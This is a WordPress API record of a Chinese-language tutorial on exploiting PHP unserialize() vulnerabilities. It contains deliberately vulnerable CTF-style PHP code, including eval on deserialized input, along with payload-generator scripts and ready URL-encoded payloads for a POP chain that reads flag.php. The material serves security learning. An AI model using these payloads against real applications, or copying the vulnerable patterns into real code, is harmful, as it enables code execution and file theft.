{"id":2223,"date":"2025-04-03T23:00:56","date_gmt":"2025-04-03T15:00:56","guid":{"rendered":"http:\/\/gzxingyu.cloud\/?p=2223"},"modified":"2025-04-03T23:00:58","modified_gmt":"2025-04-03T15:00:58","slug":"02-php%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e5%88%a9%e7%94%a8","status":"publish","type":"post","link":"http:\/\/gzxingyu.cloud\/index.php\/2025\/04\/03\/02-php%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e5%88%a9%e7%94%a8\/","title":{"rendered":"02.php\u53cd\u5e8f\u5217\u5316\u5229\u7528"},"content":{"rendered":"

\u4e00\u3001\u5c5e\u6027\u8d4b\u503c<\/h1>\n

\u8981\u5229\u7528\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff0c\u5fc5\u987b\u5411unserialize(\u51fd\u6570\u4f20\u5165\u6784\u9020\u7684\u5e8f\u5217\u5316\u6570\u636e\uff08\u5b9a\u4e49\u5408\u9002\u7684\u5c5e\u6027\u503c\uff09
\n\u4f8b\u9898\uff1a<\/p>\n

<?php\nshow_source( ___FILE__);\nerror_reporting(0);\nclass DEMO{\n\tpublic $func;\n\tpublic $arg ;\n\tpublic function safe(){\n\t\techo $this->arg;\n\t}\n\tpublic function evil(){\n\t\teval($this->arg);\n\t}\n\tpublic function run(){\n\t\t$this->{$this->func}();\n\t}\n\tfunction __construct(){\n\t$this->func = 'evil';\n\t}\n}\n$obj=unserialize($_GET['a']);\n$obj->run();\n?>\n<\/code><\/pre>\n
\u76f4\u63a5\u5199\u5e8f\u5217\u5316\u6570\u636e\u663e\u7136\u662f\u4e0d\u5408\u9002\u7684\uff0c\u56e0\u4e3a\u5e8f\u5217\u5316\u6570\u636e\u4e0d\u7b26\u5408\u4eba\u7c7b\u7684\u76f4\u89c2\u611f\u53d7\uff0c\u5f88\u5bb9\u6613\u51fa\u9519\u3002\u5b9e\u9645\u4e0a\uff0c\u90fd\u662f\u5229\u7528serialize(\u51fd\u6570\u6765\u751f\u6210\u5e8f\u5217\u5316\u6570\u636e\u7684\u3002<\/p>\n
\u751f\u6210\u6b65\u9aa4\uff1a<\/h2>\n
    \n
  1. \u628a\u9898\u76ee\u4ee3\u7801\u590d\u5236\u5230\u672c\u5730;<\/li>\n
  2. \u6ce8\u91ca\u6389\u4e0e\u5c5e\u6027\u65e0\u5173\u7684\u5185\u5bb9\uff08\u65b9\u6cd5\u548c\u6ca1\u7528\u7684\u4ee3\u7801\uff09\uff1b<\/li>\n
  3. \u5bf9\u5c5e\u6027\u8d4b\u503c;<\/li>\n
  4. \u8f93\u51faurl\u7f16\u7801\u540e\u7684\u5e8f\u5217\u5316\u6570\u636e\uff1a<\/li>\n<\/ol>\n
    echo(urlencode(serialize(new DEMO())));\n<\/code><\/pre>\n
      \n
    1. \u5c06\u5e8f\u5217\u5316\u6570\u636e\u53d1\u9001\u5230\u76ee\u6807\u670d\u52a1\u5668\u3002<\/li>\n<\/ol>\n
      \u8fdb\u884cURL\u7f16\u7801\u7684\u539f\u56e0\uff1a
      \n1.\u539f\u59cb\u7684\u5e8f\u5217\u5316\u6570\u636e\u53ef\u80fd\u5b58\u5728\u4e0d\u53ef\u89c1\u5b57\u7b26\uff1b
      \n2.\u5982\u679c\u4e0d\u8fdb\u884c\u7f16\u7801\uff0c\u6700\u540e\u8f93\u51fa\u7684\u7ed3\u679c\u662f\u7247\u6bb5\u7684\uff0c\u4e0d\u662f\u5168\u90e8\u7684\uff0c\u4f1a\u6709\u7c7b\u4f3c\u622a\u65ad\u5bfc\u81f4\u7ed3\u679c\u5f02\u5e38\uff0c\u6240\u4ee5\u9700\u8981\u8fdb\u884curl\u7f16\u7801\u3002<\/p>\n
      \u5bf9\u5c5e\u6027\u8d4b\u503c\u4e3b\u8981\u67093\u79cd\u65b9\u6cd5\uff1a<\/h2>\n
      1.\u76f4\u63a5\u5728\u5c5e\u6027\u4e2d\u8d4b\u503c\uff1a\u4f18\u70b9\u662f\u65b9\u4fbf\uff0c\u7f3a\u70b9\u662f\u53ea\u80fd\u8d4b\u503c\u5b57\u7b26\u4e32<\/p>\n
      <?php  \n\/\/show_source( __FILE__);  \n\/\/error_reporting(0);  \nclass DEMO{  \n   public $func = 'evil';  \n   public $arg = 'phpinfo();' ;  \n\/\/    public function safe(){  \n\/\/        echo $this->arg;  \n\/\/    }  \n\/\/    public function evil(){  \n\/\/        eval($this->arg);  \n\/\/    }  \n\/\/    public function run(){  \n\/\/        $this->{$this->func}();  \n\/\/    }  \n\/\/    function __construct(){  \n\/\/        $this->func = 'evil';  \n\/\/    }  \n}  \n\/\/$obj=unserialize($_GET['a']);  \n\/\/$obj->run();  \necho(urlencode(serialize(new DEMO())));  \n?>\n<\/code><\/pre>\n
      \"Pasted<\/div>
      \n\"Pasted<\/p>\n
      2.\u5916\u90e8\u8d4b\u503c\uff1a\u4f18\u70b9\u662f\u53ef\u4ee5\u8d4b\u503c\u4efb\u610f\u7c7b\u578b\u7684\u503c\uff0c\u7f3a\u70b9\u662f\u53ea\u80fd\u64cd\u4f5cpublic\u5c5e\u6027\u3002
      \n\u5c0f\u6280\u5de7\uff1a\u5bf9\u4e8ephp7.1+\u7684\u7248\u672c\uff0c\u53cd\u5e8f\u5217\u5316\u5bf9\u5c5e\u6027\u7c7b\u578b\u4e0d\u654f\u611f\u3002\u5c3d\u7ba1\u9898\u76ee\u7684\u7c7b\u4e0b\u7684\u5c5e\u6027\u53ef\u80fd\u4e0d\u662fpublic\uff0c\u4f46\u662f\u6211\u4eec\u53ef\u4ee5\u672c\u5730\u6539\u6210public\uff0c\u7136\u540e\u751f\u6210public\u7684\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u3002\u7531\u4e8e7.1+\u7248\u672c\u7684\u5bb9\u9519\u673a\u5236\uff0c\u5c3d\u7ba1\u5c5e\u6027\u7c7b\u578b\u9519\u8bef\uff0cphp\u4e5f\u8ba4\u8bc6\uff0c\u4e5f\u53ef\u4ee5\u53cd\u5e8f\u5217\u5316\u6210\u529f\u3002\u57fa\u4e8e\u6b64\uff0c\u53ef\u4ee5\u7ed5\u8fc7\u8bf8\u5982\\0\u5b57\u7b26\u7684\u8fc7\u6ee4\u3002<\/p>\n
      <?php\nclass DEMO{\n\tpublic $func;\n\tpublic $arg ;\n}\n$o = new DEMO();\n$o->func = 'evil';\n$o->arg = 'phpinfo();';\necho(urlencode(serialize($o)));\n<\/code><\/pre>\n
      3.\u6784\u9020\u65b9\u6cd5\u8d4b\u503c\uff08\u4e07\u80fd\u65b9\u6cd5\uff09\uff1a\u4f18\u70b9\u662f\u89e3\u51b3\u4e86\u4e0a\u8ff0\u7684\u5168\u90e8\u7f3a\u70b9\uff0c\u7f3a\u70b9\u662f\u6709\u70b9\u9ebb\u70e6<\/p>\n
      <?php\nclass DEMO{\n\tpublic $func;\n\tpublic $arg ;\n\tfunction __construct(){\n\t\t$this->func ='evil';\n\t\t$this->arg='phpinfo();';\n\t}\n}\n$o= new DEMO();\necho(urlencode(serialize($o)));\n<\/code><\/pre>\n
      \u4e8c\u3001\u53cd\u5e8f\u5217\u5316\u57fa\u7840\u5229\u7528<\/h1>\n
      \u4f8b\u5b501\uff1a<\/p>\n
      <?php\nclass Login{\n\tprivate $user ="Y1ng";\n\n\tfunction __destruct ()\n\t{\n\t\tif ($this->user=="admin"){\n\t\t\techo $flag;\n\t\t\t}\n\t\telse{\n\t\t\techo "you are not my admin!";\n\t\t\texit;\n\t\t}\n\t}\n}\n$exp = $_GET['exp'];\nunserialize (@$exp) ;\n<\/code><\/pre>\n
      payload\u751f\u6210\u4ee3\u7801\uff1a<\/p>\n
      <?php\nclass Login{\n\tprivate $user ="admin";\n\n\/\/\tfunction __destruct ()\n\/\/\t{\n\/\/\t\tif ($this->user=="admin"){\n\/\/\t\t\techo $flag;\n\/\/\t\t\t}\n\/\/\t\telse{\n\/\/\t\t\techo "you are not my admin!";\n\/\/\t\t\texit;\n\/\/\t\t}\n\/\/\t}\n}\n\/\/$exp = $_GET['exp'];\n\/\/unserialize (@$exp) ;\necho urlencode(serialize(new Login()));\n<\/code><\/pre>\n
      \u4e09\u3001POP\u94fe<\/h1>\n
      POP\u94fe\uff1a\u901a\u8fc7\u4ee3\u7801\u6784\u9020\u51fa\u4e00\u7ec4\u8fde\u7eed\u7684\u8c03\u7528\u94fe<\/p>\n
      \u5bfb\u627ePOP\u94fe\u7684\u601d\u8def\uff1a
      \n1.\u5bfb\u627eunserialize()\u51fd\u6570\u7684\u53c2\u6570\u662f\u5426\u53ef\u63a7;
      \n2.\u5bfb\u627e\u53cd\u5e8f\u5217\u5316\u60f3\u8981\u6267\u884c\u7684\u76ee\u6807\u51fd\u6570\uff0c\u91cd\u70b9\u5bfb\u627e\u9b54\u672f\u65b9\u6cd5\uff08\u6bd4\u5982_wakeup()\u548c_destruct()\uff09;
      \n3.\u4e00\u5c42\u4e00\u5c42\u5730\u7814\u7a76\u76ee\u6807\u5728\u9b54\u672f\u65b9\u6cd5\u4e2d\u4f7f\u7528\u7684\u5c5e\u6027\u548c\u8c03\u7528\u7684\u65b9\u6cd5\uff0c\u770b\u770b\u5176\u4e2d\u662f\u5426\u6709\u6211\u4eec\u53ef\u63a7\u7684\u5c5e\u6027\u548c\u65b9\u6cd5\uff1b
      \n4.\u6839\u636e\u6211\u4eec\u8981\u63a7\u5236\u7684\u5c5e\u6027\uff0c\u6784\u9020\u5e8f\u5217\u5316\u6570\u636e\uff0c\u53d1\u8d77\u653b\u51fb\u3002<\/p>\n
      \u4f8b\u9898\uff1a<\/p>\n
      <?php\nheader("Content-type:text\/html;charset=utf-8");\nerror_reporting(1) ;\nclass Read{\n\tpublic function get_file($value)\n\t{\n\t\t$text = base64_encode(file_get_contents ($value)) ;\n\t\treturn $text;\n\t}\n}\nclass Show\n{\n\tpublic $source;\n\tpublic $var;\n\tpublic $class1;\n\tpublic function __construct ($name='index. php')\n\t{\n\t\t$this->source = $name ;\n\t\techo $this->source.'Welcome'."<br>";\n}\n\tpublic function __toString()\n\t{\n\t\t$content = $this->class1->get_file($this->var) ;\n\t\techo $content;\n\t\treturn $content;\n\t}\n\tpublic function _show()\n\t{\n\t\tif (preg_match('\/gopher|http|ftp|https|dict|\\.\\.|flag|file\/i',$this->source)){\n\t\t\tdie('hacker');\n\t\t}else{\n\t\t\thighlight_file($this->source) ;\n\t\t}\n}\n\tpublic function Change ()\n\t{\n\t\tif (preg_match("\/gopher|http|file|ftp|https|dict|\\.\\.\/i",$this->source)){\n\t\t\techo "hacker";\n\t\t}\n\t}\n\tpublic function __get($key) {\n\t\t$function=$this->$key;\n\t\t$this->{$key} ();\n\t}\n}\nif(isset($GET['sid']))\n{\n\t$sid=$_GET['sid'];\n\t$config=unserialize($_GET['config']);\n\t$config->$sid;\n}\nelse\n{\n$show=newShow('index2.php');\n$show->_show();\n}\n<\/code><\/pre>\n
      \u5934\uff1a\u53ef\u63a7\u53c2\u6570
      \n\u5c3e\uff1a\u76ee\u6807\u51fd\u6570<\/p>\n
      \u5934\uff1a$sid $config\n\u65b9\u6cd5\u4e00\uff1a$config=new Show  $sid=__toString\n\n\u65b9\u6cd5\u4e8c\uff1a$this->source = new Show \n\nShow->__toString  $this->class1=new Read  $this->var='flag.php'\n\u5c3e\uff1aRead->get_file\n<\/code><\/pre>\n
      payload\u751f\u6210\u4ee3\u7801\uff1a<\/p>\n
      <?php  \n\/\/header("Content-type:text\/html;charset=utf-8");  \n\/\/error_reporting(1) ;  \nclass Read{  \n\/\/  public function get_file($value)  \n\/\/{  \n\/\/    $text = base64_encode(file_get_contents ($value)) ;  \n\/\/    return $text;  \n\/\/  }  \n}  \nclass Show  \n{  \n    public $source;  \n    public $var = 'flag.php';  \n    public $class1;  \n\/\/\/\/    public function __construct ($name='index. php')  \n\/\/\/\/    {  \n\/\/\/\/        $this->source = $name ;  \n\/\/\/\/        echo $this->source.'Welcome'."<br>";  \n\/\/\/\/    }  \n\/\/\/\/    public function __toString()  \n\/\/\/\/    {  \n\/\/\/\/        $content = $this->class1->get_file($this->var) ;  \n\/\/\/\/        echo $content;  \n\/\/\/\/        return $content;  \n\/\/\/\/    }  \n\/\/\/\/    public function _show()  \n\/\/\/\/    {  \n\/\/\/\/        if (preg_match('\/gopher|http|ftp|https|dict|\\.\\.|flag|file\/i',$this->source)){  \n\/\/\/\/            die('hacker');  \n\/\/\/\/        }else{  \n\/\/\/\/            highlight_file($this->source) ;  \n\/\/\/\/        }  \n\/\/\/\/    }  \n\/\/\/\/    public function Change ()  \n\/\/\/\/    {  \n\/\/\/\/        if (preg_match("\/gopher|http|file|ftp|https|dict|\\.\\.\/i",$this->source)){  \n\/\/\/\/            echo "hacker";  \n\/\/\/\/        }  \n\/\/\/\/    }  \n\/\/\/\/    public function __get($key) {  \n\/\/\/\/        $function=$this->$key;  \n\/\/\/\/        $this->{$key} ();  \n\/\/\/\/    }  \n}  \n\/\/if(isset($GET['sid']))  \n\/\/{  \n\/\/    $sid=$_GET['sid'];  \n\/\/  $config=unserialize($_GET['config']);  \n\/\/  $config->$sid;  \n\/\/}  \n\/\/else  \n\/\/{  \n\/\/    $show=newShow('index2.php');  \n\/\/    $show->_show();  \n  \n$s = new Show;  \n$s->class1 = new Read;  \necho urlencode(serialize($s));\n<\/code><\/pre>\n
      payload\uff1a<\/p>\n
      config=O%3A4%3A%22Show%22%3A3%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22var%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A6%3A%22class1%22%3BO%3A4%3A%22Read%22%3A0%3A%7B%7D%7D&sid=__toString\n<\/code><\/pre>\n
      payload\u751f\u6210\u4ee3\u7801\uff1a<\/p>\n
      <?php  \n\/\/header("Content-type:text\/html;charset=utf-8");  \n\/\/error_reporting(1) ;  \nclass Read{  \n\/\/  public function get_file($value)  \n\/\/{  \n\/\/    $text = base64_encode(file_get_contents ($value)) ;  \n\/\/    return $text;  \n\/\/  }  \n}  \nclass Show  \n{  \n    public $source;  \n    public $var = 'flag.php';  \n    public $class1;  \n\/\/\/\/    public function __construct ($name='index. php')  \n\/\/\/\/    {  \n\/\/\/\/        $this->source = $name ;  \n\/\/\/\/        echo $this->source.'Welcome'."<br>";  \n\/\/\/\/    }  \n\/\/\/\/    public function __toString()  \n\/\/\/\/    {  \n\/\/\/\/        $content = $this->class1->get_file($this->var) ;  \n\/\/\/\/        echo $content;  \n\/\/\/\/        return $content;  \n\/\/\/\/    }  \n\/\/\/\/    public function _show()  \n\/\/\/\/    {  \n\/\/\/\/        if (preg_match('\/gopher|http|ftp|https|dict|\\.\\.|flag|file\/i',$this->source)){  \n\/\/\/\/            die('hacker');  \n\/\/\/\/        }else{  \n\/\/\/\/            highlight_file($this->source) ;  \n\/\/\/\/        }  \n\/\/\/\/    }  \n\/\/\/\/    public function Change ()  \n\/\/\/\/    {  \n\/\/\/\/        if (preg_match("\/gopher|http|file|ftp|https|dict|\\.\\.\/i",$this->source)){  \n\/\/\/\/            echo "hacker";  \n\/\/\/\/        }  \n\/\/\/\/    }  \n\/\/\/\/    public function __get($key) {  \n\/\/\/\/        $function=$this->$key;  \n\/\/\/\/        $this->{$key} ();  \n\/\/\/\/    }  \n}  \n\/\/if(isset($GET['sid']))  \n\/\/{  \n\/\/    $sid=$_GET['sid'];  \n\/\/  $config=unserialize($_GET['config']);  \n\/\/  $config->$sid;  \n\/\/}  \n\/\/else  \n\/\/{  \n\/\/    $show=newShow('index2.php');  \n\/\/    $show->_show();  \n  \n$s = new Show;  \n$s->class1 = new Read;  \n$s2 = new Show;  \n$s2->source = $s;  \necho urlencode(serialize($s2));\n\/\/$s2->$s->new Read,\u7c7b\u4f3c\u4e8e\u5305\u542b\u5173\u7cfb\n<\/code><\/pre>\n
      payload\uff1a<\/p>\n
      config=O%3A4%3A%22Show%22%3A3%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A3%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22var%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A6%3A%22class1%22%3BO%3A4%3A%22Read%22%3A0%3A%7B%7D%7Ds%3A3%3A%22var%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A6%3A%22class1%22%3BN%3B%7D&sid=Change\n<\/code><\/pre>\n
      \u6216\u8005sid=_show<\/code><\/p>\n
      \u89e3\u9898\u601d\u8def\uff1a
      \n1.\u6784\u9020\u5229\u7528\u94fe\uff0c\u5c31\u8981\u627e\u5230\u5934\u548c\u5c3e\u3002\u518d\u60f3\u529e\u6cd5\u628a\u5934\u548c\u5c3e\u8fde\u63a5\u8d77\u6765\u3002
      \n2.$sid \u548c $config \u662f\u7528\u6237\u8f93\u5165\u53ef\u4ee5\u63a7\u5236\u7684\uff0c\u8fd9\u662f\u5229\u7528\u94fe\u7684\u5934\u90e8\u3002
      \n3.\u6700\u7ec8\u76ee\u7684\u662f\u8bfb\u53d6flag.php\u6587\u4ef6\uff0c\u5c31\u8981\u4ece\u6e90\u4ee3\u7801\u4e2d\u9700\u8981\u53ef\u4ee5\u8bfb\u6587\u4ef6\u6216\u8005\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u7684\u5730\u65b9\u3002Read->get_file<\/code> \u548c show->_show<\/code> \u53ef\u4ee5\u8bfb\u53d6\u6587\u4ef6\uff0c\u4f46\u662f show->_show<\/code> \u51fd\u6570\u4e0d\u5141\u8bb8\u51fa\u73b0flag\u3002\u56e0\u6b64\uff0cRead->get_file<\/code> \u5c31\u662fPOP\u94fe\u7684\u5c3e\u90e8\u3002
      \n4.\u5982\u4f55\u89e6\u53d1 Read->get_file<\/code> \u5462\uff1f \u641c\u7d22get_file\u53d1\u73b0\uff0cShow->_tostring<\/code> \u4e2d\u5b58\u5728\u4ee3\u7801<\/p>\n
      $content = $this->class1->get_file($this->var);\n<\/code><\/pre>\n
      \u90a3\u4e48\uff0c\u53ea\u9700\u8981\u4ee4<\/p>\n
      $this->class1=new Read;\n$this->var='flag.php'\n<\/code><\/pre>\n
      \u5373\u53ef\u89e6\u53d1get_file\uff0c\u5e76\u5f97\u5230flag.php\u7684\u5185\u5bb9\uff08base64\u7f16\u7801\u683c\u5f0f\uff09\u3002
      \n5.\u90a3\u4e48\u5982\u4f55\u89e6\u53d1 show->_tostring<\/code> \u5462\uff1f \u672c\u9898\u5b58\u5728\u624b\u52a8\u89e6\u53d1\u51fd\u6570\u7684\u547d\u4ee4 $config->$sid\uff1b<\/code>\uff0c\u53c2\u6570\u662f\u7528\u6237\u63a7\u5236\u7684(POP\u94fe\u7684\u5934\u90e8\uff09\uff0c\u56e0\u6b64\u53ef\u4ee5\u4ee4:<\/p>\n
      $config=new Show;\n$sid='__toString';\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
      \u4e00\u3001\u5c5e\u6027\u8d4b\u503c \u8981\u5229\u7528\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff0c\u5fc5\u987b\u5411unserialize(\u51fd\u6570\u4f20\u5165\u6784\u9020\u7684\u5e8f\u5217\u5316\u6570\u636e\uff08\u5b9a\u4e49\u5408\u9002\u7684\u5c5e\u6027\u503c\uff09  […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,21],"tags":[],"class_list":["post-2223","post","type-post","status-publish","format-standard","hentry","category-web","category-21"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2223","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=2223"}],"version-history":[{"count":1,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2223\/revisions"}],"predecessor-version":[{"id":2224,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2223\/revisions\/2224"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=2223"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=2223"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=2223"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}